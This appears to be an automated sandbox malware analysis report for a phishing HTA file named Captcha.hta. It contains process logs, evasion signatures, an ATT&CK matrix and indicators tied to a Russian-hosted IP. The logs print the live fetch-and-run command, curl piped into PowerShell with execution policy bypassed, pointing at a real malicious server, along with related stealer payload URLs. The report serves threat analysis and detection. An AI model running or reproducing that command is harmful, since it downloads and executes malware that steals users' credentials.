      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4635Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1559Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5216Thread sleep count: 4635 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5216Thread sleep count: 1559 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -3689348814741908s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000005.00000002.1715404259.0000000007150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RAM slot #0VMware Virtual RAM00000001VMW-4096MB
      Source: powershell.exe, 00000005.00000002.1715404259.0000000007130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB99+
      Source: powershell.exe, 00000005.00000002.1715404259.0000000007130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
      Source: curl.exe, 00000004.00000003.1702113255.0000000002830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Windows Management Instrumentation
      1
      DLL Side-Loading
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Email Collection
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      121
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      Logon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager121
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Software Packing
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture1
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Captcha.hta13%ReversingLabsScript.Virus.Boxter
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://147.45.44.131/infopage/bgfi.ps1&0%Avira URL Cloudsafe
      http://147.45.44.131/infopage/nghp.exe0%Avira URL Cloudsafe
      http://147.45.44.131/infopage/b0%Avira URL Cloudsafe
      http://147.45.44.131/infopage/bgfi.ps10%Avira URL Cloudsafe
      http://147.45.44.131/infopage/bgfi.ps1N0%Avira URL Cloudsafe
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://147.45.44.131/infopage/bgfi.ps1true
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://147.45.44.131/infopage/bgfi.ps1&curl.exe, 00000004.00000002.1702414499.0000000002828000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://147.45.44.131/infopage/bcurl.exe, 00000004.00000002.1702414499.0000000002828000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://147.45.44.131/infopage/nghp.exepowershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1711251710.0000000004C78000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1711251710.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://go.micropowershell.exe, 00000005.00000002.1711251710.00000000052ED000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contoso.com/powershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.1713961497.0000000005A68000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://147.45.44.131/infopage/bgfi.ps1Ncurl.exe, 00000004.00000002.1702414499.0000000002828000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1711251710.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1711251710.0000000004B54000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            147.45.44.131
                            unknownRussian Federation
                            2895FREE-NET-ASFREEnetEUtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1573886
                            Start date and time:2024-12-12 17:23:12 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 26s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Captcha.hta
                            Detection:MAL
                            Classification:mal100.phis.evad.winHTA@8/4@0/1
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 24
                            • Number of non-executed functions: 1
                            Cookbook Comments:
                            • Found application associated with file extension: .hta
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.218.208.109, 52.149.20.212, 13.107.246.63, 20.109.210.53
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target mshta.exe, PID 6388 because there are no executed function
                            • Execution Graph export aborted for target powershell.exe, PID 6892 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: Captcha.hta
                            TimeTypeDescription
                            11:24:05API Interceptor5x Sleep call for process: powershell.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            147.45.44.131Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                            • 147.45.44.131/infopage/ung0.exe
                            EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                            • 147.45.44.131/infopage/vsom.exe
                            MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                            • 147.45.44.131/infopage/Tom.exe
                            ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                            • 147.45.44.131/infopage/tvh53.exe
                            nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                            • 147.45.44.131/infopage/tbh75.exe
                            TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                            • 147.45.44.131/infopage/tbg9.exe
                            7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                            • 147.45.44.131/infopage/tbg9.exe
                            7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                            • 147.45.44.131/infopage/bhdh552.ps1
                            Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                            • 147.45.44.131/infopage/cdeea.exe
                            file.exeGet hashmaliciousLummaCBrowse
                            • 147.45.44.131/files/gqgqg.exe
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            FREE-NET-ASFREEnetEUCaptcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                            • 147.45.44.131
                            EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                            • 147.45.44.131
                            arm5.elfGet hashmaliciousUnknownBrowse
                            • 193.233.202.23
                            Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            • 147.45.47.151
                            installer.exeGet hashmaliciousUnknownBrowse
                            • 193.233.254.0
                            installer.exeGet hashmaliciousUnknownBrowse
                            • 193.233.254.0
                            MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                            • 147.45.44.131
                            tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                            • 147.45.47.81
                            kyhjasehs.exeGet hashmaliciousDCRatBrowse
                            • 147.45.47.156
                            fkydjyhjadg.exeGet hashmaliciousLummaC StealerBrowse
                            • 147.45.47.81
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1460
                            Entropy (8bit):5.51491170894079
                            Encrypted:false
                            SSDEEP:24:36g1WSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NK3R8aajOd9ia8H8C6wn:qg1WSU4xympgv4RIoUP7mZ9tK8NWR8aU
